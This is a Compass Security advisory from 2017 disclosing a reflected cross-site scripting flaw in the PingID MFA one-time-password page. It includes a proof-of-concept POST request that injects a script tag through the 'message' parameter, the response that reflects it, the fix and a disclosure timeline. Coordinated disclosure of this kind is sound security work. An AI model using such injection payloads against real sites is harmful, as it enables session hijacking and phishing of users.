PingID (MFA) - Reflected Cross-Site Scripting

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:   Reflected Cross-Site Scripting
# Risk:        High
# Effect:     Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:      18.04.2017
#
#############################################################

Introduction:
-------------
With PingID MFA, you can easily control when your users need to authenticat=
e with a
second factor. You can configure your policies based upon the following:
    Group - Require MFA for members of a specific group.
    Application - Require MFA for specific applications.
    Geofence - Require MFA if the user is outside a pre-set geofence.
    Rooted or Jailbroken device - Require MFA if the users device is roote=
d or jailbroken.
    Network IP - Require MFA if the device isnt in a specific IP range.
PingID MFA delivers the granular security that your policies require with t=
he ease
of use your users want. [1]

Compass Security discovered a web application security flaw in PingIDs aut=
hentication
process, which allows an attacker to manipulate the resulting website. This=
 allows,
for instance, attacking the users browser or redirecting the user to a phi=
shing website.


Technical Description
---------------------
During the authentication process, a message parameter is used, which can
be manipulated. If this parameter contains JavaScript code, it is executed
in the users browser. Exploiting the vulnerability will lead to so-called
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the
context of the victim.

Request:
POST /pingid/ppm/auth/otp HTTP/1.1
Host: authenticator.pingone.com
[CUT]
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

otp=3D123456&message=3D<script>alert(0)</script>

Response:
HTTP/1.1 200 OK
Date: Thu, 13 Apr 2017 11:21:45 GMT
Server:
Cache-Control: no-cache, no-store
[CUT]
Connection: close
X-Content-Type-Options: nosniff
Content-Length: 8313

<!DOCTYPE html>
<html>
<head>
    [CUT]
</head>
<body>
[CUT]
    <div class=3D"admin-message"><script>alert(0)</script></div>
[CUT]
</body>
</html>


Workaround / Fix:
-----------------
The vendor has addressed the vulnerability. In general, this issue can be f=
ixed by
properly encoding all output, which is posted back to the user.
For instance, using HTML encoding, to convert < to &lt; and > to &gt;.


Timeline:
---------
2017-05-16:     Coordinated public disclosure date
2017-05-03:     Release of fixed version/patch
2017-04-20:     Initial vendor response
2017-04-19:     Initial vendor notification
2017-04-13:     Discovery by Stephan Sekula


References:
-----------
[1] https://www.pingidentity.com/en/products/pingid.html